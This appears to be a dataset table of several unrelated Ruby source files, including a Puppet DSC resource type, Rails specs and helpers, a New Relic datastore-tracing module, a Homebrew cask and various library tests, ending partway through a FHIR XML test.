hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
b9f1e71b3aaea9c86ed19cc9f9aa6a83457b5c10 | 4,428 | require 'pathname'
Puppet::Type.newtype(:dsc_xd7storefrontunifiedexperience) do
require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
@doc = %q{
The DSC XD7StoreFrontUnifiedExperience resource type.
Automatically generated from
'XenDesktop7/DSCResources/VE_XD7StoreFrontUnifiedExperience/VE_XD7StoreFrontUnifiedExperience.schema.mof'
To learn more about PowerShell Desired State Configuration, please
visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
For more information about built-in DSC Resources, please visit
https://technet.microsoft.com/en-us/library/dn249921.aspx.
For more information about xDsc Resources, please visit
https://github.com/PowerShell/DscResources.
}
validate do
fail('dsc_virtualpath is a required attribute') if self[:dsc_virtualpath].nil?
end
def dscmeta_resource_friendly_name; 'XD7StoreFrontUnifiedExperience' end
def dscmeta_resource_name; 'VE_XD7StoreFrontUnifiedExperience' end
def dscmeta_module_name; 'XenDesktop7' end
def dscmeta_module_version; '2.5.10' end
newparam(:name, :namevar => true ) do
end
ensurable do
newvalue(:exists?) { provider.exists? }
newvalue(:present) { provider.create }
newvalue(:absent) { provider.destroy }
defaultto { :present }
end
# Name: PsDscRunAsCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_psdscrunascredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "PsDscRunAsCredential"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
end
end
# Name: VirtualPath
# Type: string
# IsMandatory: True
# Values: None
newparam(:dsc_virtualpath) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "VirtualPath - Citrix Storefront Store IIS Virtual Path"
isrequired
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: WebReceiverVirtualPath
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_webreceivervirtualpath) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "WebReceiverVirtualPath - Citrix Storefront Receiver for Web IIS Virtual Path"
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: SiteId
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_siteid) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "SiteId - Citrix Storefront Authentication Service IIS Site Id"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: Ensure
# Type: string
# IsMandatory: False
# Values: ["Present", "Absent"]
newparam(:dsc_ensure) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "Ensure - Valid values are Present, Absent."
validate do |value|
resource[:ensure] = value.downcase
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
unless ['Present', 'present', 'Absent', 'absent'].include?(value)
fail("Invalid value '#{value}'. Valid values are Present, Absent")
end
end
end
def builddepends
pending_relations = super()
PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
end
end
Puppet::Type.type(:dsc_xd7storefrontunifiedexperience).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
defaultfor :operatingsystem => :windows
mk_resource_methods
end
| 31.856115 | 140 | 0.682023 |
18cc5fb197e29f311597c484d5e9c1eba877aafd | 136 | # Be sure to restart your server when you modify this file.
Moya::Application.config.session_store :cookie_store, key: '_moya_session'
| 34 | 74 | 0.794118 |
0110246c373702816fb76e620de5d2e8cd0e9398 | 5,471 | require 'rails_helper'
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to specify the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
#
# Compared to earlier versions of this generator, there is very limited use of
# stubs and message expectations in this spec. Stubs are only used when there
# is no simpler way to get a handle on the object needed for the example.
# Message expectations are only used when there is no simpler way to specify
# that an instance is receiving a specific message.
#
# Also compared to earlier versions of this generator, there are no longer any
# expectations of assigns and templates rendered. These features have been
# removed from Rails core in Rails 5, but can be added back in via the
# `rails-controller-testing` gem.
RSpec.describe EventsController, type: :controller do
# This should return the minimal set of attributes required to create a valid
# Event. As you add validations to Event, be sure to
# adjust the attributes here as well.
let(:valid_attributes) {
{
:title => "Title",
:min_member => 2,
:max_member => 4,
:max_group_member => 3,
:description => "MyText"
}
}
let(:invalid_attributes) {
{
:title => "Title",
:min_member => 2,
:max_member => 3,
:max_group_member => 4,
:description => "MyText"
}
}
# This should return the minimal set of values that should be in the session
# in order to pass any filters (e.g. authentication) defined in
# EventsController. Be sure to keep this updated too.
let(:valid_session) { {} }
describe "GET #index" do
it "returns a success response" do
event = Event.create! valid_attributes
get :index, params: {}, session: valid_session
expect(response).to be_success
end
end
describe "GET #show" do
it "returns a success response" do
event = Event.create! valid_attributes
get :show, params: {id: event.to_param}, session: valid_session
expect(response).to be_success
end
end
describe "GET #new" do
it "returns a success response" do
get :new, params: {}, session: valid_session
expect(response).to be_success
end
end
describe "GET #edit" do
it "returns a success response" do
event = Event.create! valid_attributes
get :edit, params: {id: event.to_param}, session: valid_session
expect(response).to be_success
end
end
describe "POST #create" do
context "with valid params" do
it "creates a new Event" do
expect {
post :create, params: {event: valid_attributes}, session: valid_session
}.to change(Event, :count).by(1)
end
it "redirects to the created event" do
post :create, params: {event: valid_attributes}, session: valid_session
expect(response).to redirect_to(Event.last)
end
end
context "with invalid params" do
it "returns a success response (i.e. to display the 'new' template)" do
post :create, params: {event: invalid_attributes}, session: valid_session
expect(response).to be_success
end
end
end
describe "PUT #update" do
context "with valid params" do
let(:new_attributes) {
{
:title => "Title2",
:min_member => 3,
:max_member => 5,
:max_group_member => 4,
:description => "MyText2"
}
}
it "updates the requested event" do
event = Event.create! valid_attributes
put :update, params: {id: event.to_param, event: new_attributes}, session: valid_session
event.reload
expect(event.title).to eq "Title2"
expect(event.min_member).to be 3
expect(event.max_member).to be 5
expect(event.max_group_member).to be 4
expect(event.description).to eq "MyText2"
end
it "redirects to the event" do
event = Event.create! valid_attributes
put :update, params: {id: event.to_param, event: valid_attributes}, session: valid_session
expect(response).to redirect_to(event)
end
end
context "with invalid params" do
it "returns a success response (i.e. to display the 'edit' template)" do
event = Event.create! valid_attributes
put :update, params: {id: event.to_param, event: invalid_attributes}, session: valid_session
expect(response).to be_success
end
end
end
describe "DELETE #destroy" do
it "destroys the requested event" do
event = Event.create! valid_attributes
expect {
delete :destroy, params: {id: event.to_param}, session: valid_session
}.to change(Event, :count).by(-1)
end
it "redirects to the events list" do
event = Event.create! valid_attributes
delete :destroy, params: {id: event.to_param}, session: valid_session
expect(response).to redirect_to(events_url)
end
end
end
| 33.359756 | 100 | 0.67282 |
61978c47eeb959767128e373dd982250d149f8cb | 8,348 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/rpm/blob/master/LICENSE for complete details.
require 'new_relic/agent/datastores/metric_helper'
module NewRelic
module Agent
#
# This module contains helper methods to facilitate instrumentation of
# datastores not directly supported by the Ruby agent. It is intended to be
# primarily used by authors of 3rd-party datastore instrumentation.
#
# @api public
module Datastores
# @!group Tracing query methods
# Add Datastore tracing to a method. This properly generates the metrics
# for New Relic's Datastore features. It does not capture the actual
# query content into Transaction Traces. Use wrap if you want to provide
# that functionality.
#
# @param [Class] clazz the class to instrument
#
# @param [String, Symbol] method_name the name of instance method to
# instrument
#
# @param [String] product name of your datastore for use in metric naming, e.g. "Redis"
#
# @param [optional,String] operation the name of operation if different
# than the instrumented method name
#
# @api public
#
def self.trace(clazz, method_name, product, operation = method_name)
NewRelic::Agent.record_api_supportability_metric(:trace)
clazz.class_eval do
method_name_without_newrelic = "#{method_name}_without_newrelic"
if NewRelic::Helper.instance_methods_include?(clazz, method_name) &&
!NewRelic::Helper.instance_methods_include?(clazz, method_name_without_newrelic)
visibility = NewRelic::Helper.instance_method_visibility(clazz, method_name)
alias_method method_name_without_newrelic, method_name
define_method(method_name) do |*args, &blk|
segment = NewRelic::Agent::Transaction.start_datastore_segment(
product: product,
operation: operation
)
begin
send(method_name_without_newrelic, *args, &blk)
ensure
segment.finish if segment
end
end
send visibility, method_name
send visibility, method_name_without_newrelic
end
end
end
# Wrap a call to a datastore and record New Relic Datastore metrics. This
# method can be used when a collection (i.e. table or model name) is
# known at runtime to be included in the metric naming. It is intended
# for situations that the simpler NewRelic::Agent::Datastores.trace can't
# properly handle.
#
# To use this, wrap the datastore operation in the block passed to wrap.
#
# NewRelic::Agent::Datastores.wrap("FauxDB", "find", "items") do
# FauxDB.find(query)
# end
#
# @param [String] product the datastore name for use in metric naming,
# e.g. "FauxDB"
#
# @param [String,Symbol] operation the name of operation (e.g. "select"),
# often named after the method that's being instrumented.
#
# @param [optional, String] collection the collection name for use in
# statement-level metrics (i.e. table or model name)
#
# @param [Proc,#call] callback proc or other callable to invoke after
# running the datastore block. Receives three arguments: result of the
# yield, the most specific (scoped) metric name, and elapsed time of the
# call. An example use is attaching SQL to Transaction Traces at the end
# of a wrapped datastore call.
#
# callback = Proc.new do |result, metrics, elapsed|
# NewRelic::Agent::Datastores.notice_sql(query, metrics, elapsed)
# end
#
# NewRelic::Agent::Datastores.wrap("FauxDB", "find", "items", callback) do
# FauxDB.find(query)
# end
#
# @note THERE ARE SECURITY CONCERNS WHEN CAPTURING QUERY TEXT!
# New Relic's Transaction Tracing and Slow SQL features will
# attempt to apply obfuscation to the passed queries, but it is possible
# for a query format to be unsupported and result in exposing user
# information embedded within captured queries.
#
# @api public
#
def self.wrap(product, operation, collection = nil, callback = nil)
NewRelic::Agent.record_api_supportability_metric(:wrap)
return yield unless operation
segment = NewRelic::Agent::Transaction.start_datastore_segment(
product: product,
operation: operation,
collection: collection
)
begin
result = yield
ensure
begin
if callback
elapsed_time = (Time.now - segment.start_time).to_f
callback.call(result, segment.name, elapsed_time)
end
ensure
segment.finish if segment
end
end
end
# @!group Capturing query / statement text
# Wrapper for simplifying attaching SQL queries during a transaction.
#
# If you are recording non-SQL data, please use {notice_statement}
# instead.
#
# NewRelic::Agent::Datastores.notice_sql(query, metrics, elapsed)
#
# @param [String] query the SQL text to be captured. Note that depending
# on user settings, this string will be run through obfuscation, but
# some dialects of SQL (or non-SQL queries) are not guaranteed to be
# properly obfuscated by these routines!
#
# @param [String] scoped_metric The most specific metric relating to this
# query. Typically the result of
# NewRelic::Agent::Datastores::MetricHelper#metrics_for
#
# @param [Float] elapsed the elapsed time during query execution
#
# @note THERE ARE SECURITY CONCERNS WHEN CAPTURING QUERY TEXT!
# New Relic's Transaction Tracing and Slow SQL features will
# attempt to apply obfuscation to the passed queries, but it is possible
# for a query format to be unsupported and result in exposing user
# information embedded within captured queries.
#
# @api public
#
def self.notice_sql(query, scoped_metric, elapsed)
NewRelic::Agent.record_api_supportability_metric(:notice_sql)
state = TransactionState.tl_get
if (txn = state.current_transaction) && (segment = txn.current_segment) && segment.respond_to?(:notice_sql)
segment.notice_sql(query)
end
nil
end
# Wrapper for simplifying attaching non-SQL data statements to a
# transaction. For instance, Mongo or CQL queries, Memcached or Redis
# keys would all be appropriate data to attach as statements.
#
# Data passed to this method is NOT obfuscated by New Relic, so please
# ensure that user information is obfuscated if the agent setting
# `transaction_tracer.record_sql` is set to `obfuscated`
#
# NewRelic::Agent::Datastores.notice_statement("key", elapsed)
#
# @param [String] statement text of the statement to capture.
#
# @param [Float] elapsed the elapsed time during query execution
#
# @note THERE ARE SECURITY CONCERNS WHEN CAPTURING STATEMENTS!
# This method will properly ignore statements when the user has turned
# off capturing queries, but it is not able to obfuscate arbitrary data!
# To prevent exposing user information embedded in captured queries,
# please ensure all data passed to this method is safe to transmit to
# New Relic.
#
# @api public
#
def self.notice_statement(statement, elapsed)
NewRelic::Agent.record_api_supportability_metric(:notice_statement)
# Settings may change eventually, but for now we follow the same
# capture rules as SQL for non-SQL statements.
state = TransactionState.tl_get
if (txn = state.current_transaction) && (segment = txn.current_segment) && segment.respond_to?(:notice_nosql_statement)
segment.notice_nosql_statement(statement)
end
nil
end
end
end
end
| 39.563981 | 127 | 0.64758 |
ed3c4318794a87cd1a132b4a2e20d6ebecec7b05 | 747 | # frozen_string_literal: true
class QueryDelegator
module MemoryFetching
# Returns the first record that meets the +condition+, otherwise
# returns the given +block value+ or
# returns +nil+ by default unless a second argument is specified.
def fetch(condition, default_value = nil)
grep(condition) { |found| return found }
return yield condition if defined? yield
default_value
end
# Returns the first record that meets either the +block condition+ if given or the argument +condition+, otherwise
# returns a new record with Hash from the argument +condition+.
def fetch_or_new(condition, &block_condition)
fetch(block_condition || condition) { new(condition.to_h) }
end
end
end
| 33.954545 | 118 | 0.720214 |
e99920d53ff4a32e54ebbf162d2a10201f9240e9 | 490 | # Rake tasks used to update the aasm_state of the employer to enrolled && plan year aasm state to enrolled.
# To run rake task: RAILS_ENV=production bundle exec rake migrations:link_employees_to_employer ce=57644137f1244e0adf000011,57644137f1244e0adf000005
require File.join(Rails.root, "app", "data_migrations", "link_employees_to_employer")
namespace :migrations do
desc "Link employees to employer"
LinkEmployeesToEmployer.define_task :link_employees_to_employer => :environment
end | 61.25 | 148 | 0.828571 |
b906013285782c832b2a1f5ba40b0f7fff5b611b | 850 | cask :v1 => 'coda' do
version '2.5.12'
sha256 '3bcb4a1f99a47edd087b9579c206a38cecae1a31287e84121c5775b8752a8c3f'
url "https://download.panic.com/coda/Coda%20#{version}.zip"
name 'Coda'
homepage 'https://panic.com/Coda/'
license :commercial
tags :vendor => 'Panic'
zap :delete => [
'~/Library/Application Support/Coda 2',
'~/Library/Application Support/Growl/Tickets/Coda 2.growlTicket',
'~/Library/Caches/com.panic.Coda2',
'~/Library/Caches/com.apple.helpd/Generated/com.panic.Coda2.help',
'~/Library/Preferences/com.panic.Coda2.plist',
'~/Library/Preferences/com.panic.Coda2.LSSharedFileList.plist',
'~/Library/Preferences/com.panic.Coda2.LSSharedFileList.plist.lockfile',
'~/Library/Saved Application State/com.panic.Coda2.savedState'
]
depends_on :macos => '>= :lion'
app 'Coda 2.app'
end
| 32.692308 | 76 | 0.710588 |
1c20072dfa5bd1c1f4dc93945fe2c69ed78372ea | 1,547 | module SessionsHelper
def log_in(user)
session[:user_id] = user.id
end
def log_out
user = current_user
forget(user)
session.delete(:user_id)
@current_user = nil
end
def current_user
if (user_id = session[:user_id])
@current_user ||= User.find_by(id: user_id)
elsif (user_id = cookies.signed[:user_id])
user = User.find_by(id: user_id)
if user && user.authenticated?(:remember, cookies[:remember_token])
log_in user
@current_user = user
end
end
end
def logged_in?
!current_user.nil?
end
def remember(user)
user.remember
cookies.permanent.signed[:user_id] = user.id
cookies.permanent[:remember_token] = user.remember_token
end
def forget(user)
user.forget
cookies.delete(:user_id)
cookies.delete(:remember_token)
end
def logged_user
user = current_user
unless logged_in? && (user.poste != '1' || user.administrateur)
flash[:danger] = "Vous n'avez pas l'authorisation d'être sur cette page !"
redirect_to login_path
end
end
def logged_cadre
user = current_user
unless logged_in? && (user.poste == '1'|| user.administrateur)
flash[:danger] = "Vous n'avez pas l'authorisation d'être sur cette page !"
redirect_to root_path
end
true
end
def logged_admin
user = current_user
unless logged_in? && user.administrateur
flash[:danger] = "Vous n'avez pas l'authorisation d'être sur cette page !"
redirect_to root_path
end
true
end
end
| 23.089552 | 80 | 0.660633 |
f7caa43ac88fe614edee37562a17bff1b2591ac5 | 1,238 | require 'rails/generators/active_record'
module ActiveRecord
module Generators
class ModelGenerator < Base
argument :attributes, :type => :array, :default => [], :banner => "field:type field:type"
check_class_collision
class_option :migration, :type => :boolean
class_option :timestamps, :type => :boolean
class_option :parent, :type => :string, :desc => "The parent class for the generated model"
class_option :indexes, :type => :boolean, :default => true, :desc => "Add indexes for references and belongs_to columns"
def create_migration_file
return unless options[:migration] && options[:parent].nil?
migration_template "migration.rb", "db/migrate/create_#{table_name}.rb"
end
def create_model_file
template 'model.rb', File.join('app/models', class_path, "#{file_name}.rb")
end
def create_module_file
return if regular_class_path.empty?
template 'module.rb', File.join('app/models', "#{class_path.join('/')}.rb") if behavior == :invoke
end
hook_for :test_framework
protected
def parent_class_name
options[:parent] || "ActiveRecord::Base"
end
end
end
end
| 30.95 | 129 | 0.65105 |
01243648e7817f3310efc103af8a974cd5799518 | 5,257 | # frozen_string_literal: true
describe 'Ridgepole::Client#diff -> migrate' do
context 'when rename table' do
let(:actual_dsl) do
erbh(<<-ERB)
create_table "clubs", force: :cascade do |t|
t.string "name", default: "", null: false
t.index ["name"], name: "idx_name", unique: true
end
create_table "departments", primary_key: "dept_no", force: :cascade do |t|
t.string "dept_name", limit: 40, null: false
t.index ["dept_name"], name: "dept_name", unique: true
end
create_table "dept_emp", id: false, force: :cascade do |t|
t.integer "emp_no", null: false
t.string "dept_no", null: false
t.date "from_date", null: false
t.date "to_date", null: false
t.index ["dept_no"], name: "dept_no"
t.index ["emp_no"], name: "emp_no"
end
create_table "dept_manager", id: false, force: :cascade do |t|
t.string "dept_no", null: false
t.integer "emp_no", null: false
t.date "from_date", null: false
t.date "to_date", null: false
t.index ["dept_no"], name: "dept_no"
t.index ["emp_no"], name: "emp_no"
end
create_table "employee_clubs", force: :cascade do |t|
t.integer "emp_no", null: false
t.integer "club_id", null: false
t.index ["emp_no", "club_id"], name: "idx_emp_no_club_id"
end
create_table "employees2", primary_key: "emp_no", force: :cascade do |t|
t.date "birth_date", null: false
t.string "first_name", limit: 14, null: false
t.string "last_name", limit: 16, null: false
t.string "gender", limit: 1, null: false
t.date "hire_date", null: false
end
create_table "salaries", id: false, force: :cascade do |t|
t.integer "emp_no", null: false
t.integer "salary", null: false
t.date "from_date", null: false
t.date "to_date", null: false
t.index ["emp_no"], name: "emp_no"
end
create_table "titles", id: false, force: :cascade do |t|
t.integer "emp_no", null: false
t.string "title", limit: 50, null: false
t.date "from_date", null: false
t.date "to_date"
t.index ["emp_no"], name: "emp_no"
end
ERB
end
let(:expected_dsl) do
erbh(<<-ERB)
create_table "clubs", force: :cascade do |t|
t.string "name", default: "", null: false
t.index ["name"], name: "idx_name", unique: true
end
create_table "departments", primary_key: "dept_no", force: :cascade do |t|
t.string "dept_name", limit: 40, null: false
t.index ["dept_name"], name: "dept_name", unique: true
end
create_table "dept_emp", id: false, force: :cascade do |t|
t.integer "emp_no", null: false
t.string "dept_no", null: false
t.date "from_date", null: false
t.date "to_date", null: false
t.index ["dept_no"], name: "dept_no"
t.index ["emp_no"], name: "emp_no"
end
create_table "dept_manager", id: false, force: :cascade do |t|
t.string "dept_no", null: false
t.integer "emp_no", null: false
t.date "from_date", null: false
t.date "to_date", null: false
t.index ["dept_no"], name: "dept_no"
t.index ["emp_no"], name: "emp_no"
end
create_table "employee_clubs", force: :cascade do |t|
t.integer "emp_no", null: false
t.integer "club_id", null: false
t.index ["emp_no", "club_id"], name: "idx_emp_no_club_id"
end
create_table "employees2", primary_key: "emp_no", force: :cascade, renamed_from: 'employees' do |t|
t.date "birth_date", null: false
t.string "first_name", limit: 14, null: false
t.string "last_name", limit: 16, null: false
t.string "gender", limit: 1, null: false
t.date "hire_date", null: false
end
create_table "salaries", id: false, force: :cascade do |t|
t.integer "emp_no", null: false
t.integer "salary", null: false
t.date "from_date", null: false
t.date "to_date", null: false
t.index ["emp_no"], name: "emp_no"
end
create_table "titles", id: false, force: :cascade do |t|
t.integer "emp_no", null: false
t.string "title", limit: 50, null: false
t.date "from_date", null: false
t.date "to_date"
t.index ["emp_no"], name: "emp_no"
end
ERB
end
before { subject.diff(actual_dsl).migrate }
subject { client }
it {
expect(Ridgepole::Logger.instance).to receive(:warn).with('[WARNING] The table `employees` has already been renamed to the table `employees2`.')
delta = subject.diff(expected_dsl)
expect(delta.differ?).to be_falsey
expect(subject.dump).to match_ruby actual_dsl
delta.migrate
expect(subject.dump).to match_ruby expected_dsl.gsub(/, renamed_from: 'employees'/, '')
}
end
end
| 37.021127 | 150 | 0.562108 |
03f3c2cd549bb2f614df5ab7f61d1248a6eab4a8 | 1,007 | require "rails_helper"
include Warden::Test::Helpers
include FormAnswerFilteringTestHelper
Warden.test_mode!
describe "As Assessor I want to filter applications", js: true do
let!(:assessor) { create(:assessor) }
let!(:ceremonial_county) { create(:ceremonial_county) }
before do
@forms = []
4.times do
@forms << create(:form_answer, state: "local_assessment_recommended", sub_group: assessor.sub_group)
end
@forms.each.map do |form|
form.save!(validate: false)
end
login_as(assessor, scope: :assessor)
visit assessor_form_answers_path
end
it "filters by activity" do
assert_results_number(4)
assign_activity(@forms.first, "ART")
# Untick sport activity filter
click_status_option "Sport"
assert_results_number(1)
end
it "filters by ceremonial county" do
assert_results_number(4)
assign_ceremonial_county(@forms.first, ceremonial_county)
click_status_option("Not assigned")
assert_results_number(1)
end
end
| 23.97619 | 106 | 0.722939 |
1afa1f51b379e58d9370b146c9108055686e0951 | 141 | class RemoveUserFromBook < ActiveRecord::Migration
def change
remove_reference :books, :user, index: true, foreign_key: true
end
end
| 23.5 | 66 | 0.765957 |
d5c5618540de2d7b7278126db42a099a20458e2a | 1,595 | # vFabric Administration Server Ruby API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Shared
# @abstract A collection of an instance's pending configurations
class PendingConfigurations < MutableCollection
# Creates a new configuration. The configuration will be pending until its instance is started at which point the configuration will become live
#
# @param path [String] the configuration's path
# @param content [String] the configuration's content
#
# @return [PendingConfiguration] the new configuration
def create(path, content)
create_image(content, { :path => path })
end
end
# @abstract A configuration file that is pending and will be made live the next time its instance is started
class PendingConfiguration < Configuration
include Deletable
# Updates the contents of the configuration
#
# @param new_content [String] the new content
def content=(new_content)
client.post(content_location, new_content)
reload
end
end
end | 32.55102 | 148 | 0.739185 |
626da622812eae3931f4830263b6ffccf511988a | 451 | module PactBroker
module Pacts
module LazyLoaders
HEAD_PACT_PUBLICATIONS_FOR_TAGS = lambda {
consumer_version_tag_names = PactBroker::Domain::Tag.select(:name).where(version_id: consumer_version_id)
PactPublication
.for_consumer(consumer)
.for_provider(provider)
.latest_for_consumer_tag(consumer_version_tag_names)
.from_self.order_by(:tag_name)
}
end
end
end
| 30.066667 | 113 | 0.682927 |
e2f894a34808dec24998cb7435ec637e237e071f | 1,113 | $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
require './test/replica_sets/rs_test_helper'
class ComplexConnectTest < Test::Unit::TestCase
def setup
ensure_rs
end
def teardown
@rs.restart_killed_nodes
@conn.close if defined?(@conn) && @conn
end
def test_complex_connect
primary = Connection.new(@rs.host, @rs.ports[0])
@conn = ReplSetConnection.new([
"#{@rs.host}:#{@rs.ports[2]}",
"#{@rs.host}:#{@rs.ports[1]}",
"#{@rs.host}:#{@rs.ports[0]}",
])
@conn['test']['foo'].insert({:a => 1})
assert @conn['test']['foo'].find_one
config = primary['local']['system.replset'].find_one
config['version'] += 1
config['members'].delete_if do |member|
member['host'].include?(@rs.ports[2].to_s)
end
assert_raise ConnectionFailure do
primary['admin'].command({:replSetReconfig => config})
end
@rs.ensure_up
assert_raise ConnectionFailure do
primary['admin'].command({:replSetStepDown => 1})
end
rescue_connection_failure do
assert @conn['test']['foo'].find_one
end
end
end
| 24.195652 | 60 | 0.621743 |
1cda0f198d65ce51d7f95a5becb23bf6b61e868b | 6,041 | require 'alki/feature_test'
describe 'Overlays' do
it 'should allow setting an overlay on a service' do
values = []
assembly = Alki.create_assembly do
service :svc do
:test
end
overlay :svc, :test_overlay
set :test_overlay, ->(value) {values << value; :transformed}
end
assembly.new.svc.must_equal :transformed
values.must_equal [:test]
end
it 'should call new if overlay responds to it' do
assembly = Alki.create_assembly do
service :svc do
:test
end
overlay :svc, :test_overlay
set :test_overlay, Struct.new(:val)
end
assembly.new.svc.val.must_equal :test
end
it 'should allow using factories as overlays' do
values = []
assembly = Alki.create_assembly do
service :svc do
:test
end
overlay :svc, :test_overlay
factory :test_overlay do
->(value) {values << value; :transformed}
end
end
assembly.new.svc.must_equal :transformed
values.must_equal [:test]
end
it 'should allow setting an overlay on groups of services' do
values = []
assembly = Alki.create_assembly do
service :svc do
:test
end
group :svcs do
service :one do
:svc_one
end
service :two do
:svc_two
end
end
overlay :svcs, :test_overlay
set :test_overlay, ->(value) {values << value; "overlay_#{value}".to_sym}
end
obj = assembly.new
obj.svc.must_equal :test
obj.svcs.one.must_equal :overlay_svc_one
obj.svcs.two.must_equal :overlay_svc_two
values.must_equal [:svc_one,:svc_two]
end
it 'should not apply to non-services' do
values = []
assembly = Alki.create_assembly do
group :vals do
set :one do
:val_one
end
factory :two do
->(v) { "val_two_#{v}".to_sym }
end
func :three do
:val_three
end
end
overlay :vals, :test_overlay
set :test_overlay, ->(value) {values << value; "overlay_#{value}".to_sym}
end
obj = assembly.new
obj.vals.one.must_equal :val_one
obj.vals.two(1).must_equal :val_two_1
obj.vals.three.must_equal :val_three
values.must_equal []
end
it 'should chain overlays when multiple are set' do
values = []
assembly = Alki.create_assembly do
group :svcs do
service :svc do
:test
end
end
overlay :svcs, :overlay1
overlay 'svcs.svc', :overlay2
set :overlay1, ->(value) {values << value; "overlay_#{value}".to_sym}
set :overlay2, ->(value) {values << value; :transformed}
end
obj = assembly.new
obj.svcs.svc.must_equal :transformed
values.must_equal [:test,:overlay_test]
end
it 'should follow paths when setting overlay targets' do
values = []
assembly = Alki.create_assembly do
service :svc do
:test
end
group :grp do
overlay 'assembly.svc', :test_overlay
set :test_overlay, ->(value) {values << value; :transformed}
end
end
obj = assembly.new
obj.svc.must_equal :transformed
values.must_equal [:test]
end
it 'should raise error if either target or overlay paths are invalid' do
assembly = Alki.create_assembly do
service :svc do
:test
end
overlay :invalid, :test_overlay
set :test_overlay, ->(value) {:child}
end
assert_raises Alki::InvalidPathError do
assembly.new.svc
end
assembly = Alki.create_assembly do
service :svc do
:test
end
overlay :svc, :invalid
end
assert_raises Alki::InvalidPathError do
assembly.new.svc
end
end
it 'should set overlays through mounted assemblies' do
child = Alki.create_assembly do
service :svc do
:test
end
overlay 'parent.svc', :test_overlay
set :test_overlay, ->(value) {:child}
end
assembly = Alki.create_assembly do
service :svc do
:test
end
mount :mounted, child
overlay 'mounted.svc', :test_overlay
set :test_overlay, ->(value) {:parent}
end
obj = assembly.new
obj.svc.must_equal :child
obj.mounted.svc.must_equal :parent
end
it 'should set overlays from overrides' do
child = Alki.create_assembly do
service :svc1 do
:test
end
end
assembly = Alki.create_assembly do
service :svc2 do
:test
end
mount :mounted, child do
overlay 'svc1', :test_overlay
set :test_overlay, ->(value) {:parent}
end
end
obj = assembly.new do
overlay 'svc2', :test_overlay
set :test_overlay, ->(value) {:child}
end
obj.svc2.must_equal :child
obj.mounted.svc1.must_equal :parent
end
it 'should set overlays on overridden elements' do
child = Alki.create_assembly do
set :test_overlay, ->(value) {:"#{value}_child"}
overlay 'svc1', :test_overlay
service :svc1 do
:test1
end
end
assembly = Alki.create_assembly do
group :grp do
service :svc2 do
:test2
end
end
overlay 'grp.svc2', :test_overlay
set :test_overlay, ->(value) {:"#{value}_parent"}
mount :mounted, child do
service :svc1 do
:test12
end
end
end
obj = assembly.new do
group :grp do
service :svc2 do
:test22
end
end
end
obj.mounted.svc1.must_equal :test12_child
obj.grp.svc2.must_equal :test22_parent
end
it 'should allow setting overlays on assembly_instance' do
values = []
mock = Minitest::Mock.new
assembly = Alki.create_assembly do
overlay :assembly_instance, :test_overlay
set :val, 1
set :test_overlay, ->(value) {
values << value
mock
}
end
mock.expect :val, 2
assembly.new.val.must_equal 2
values.size.must_equal 1
values[0].val.must_equal 1
end
end
| 23.057252 | 79 | 0.606025 |
1c456e4c8d397cd7b018dde7fd2d15c152cf85ee | 4,920 | require_relative '../test_helper'
class XmlFormatTest < Test::Unit::TestCase
ERROR_DIR = File.join('tmp', 'errors', 'XmlFormatTest')
ERROR_LOSSY_DIR = File.join('tmp', 'errors', 'XmlLossinessTest')
EXAMPLE_ROOT = File.join('lib', 'fhir_stu3_models', 'examples', 'xml')
# Automatically generate one test method per example file
example_files = File.join(EXAMPLE_ROOT, '**', '*.xml')
raise 'No Examples Found' if Dir[example_files].empty?
# Create a blank folder for the errors
FileUtils.rm_rf(ERROR_DIR) if File.directory?(ERROR_DIR)
FileUtils.mkdir_p ERROR_DIR
FileUtils.rm_rf(ERROR_LOSSY_DIR) if File.directory?(ERROR_LOSSY_DIR)
FileUtils.mkdir_p ERROR_LOSSY_DIR
Dir.glob(example_files).each do |example_file|
example_name = File.basename(example_file, '.xml')
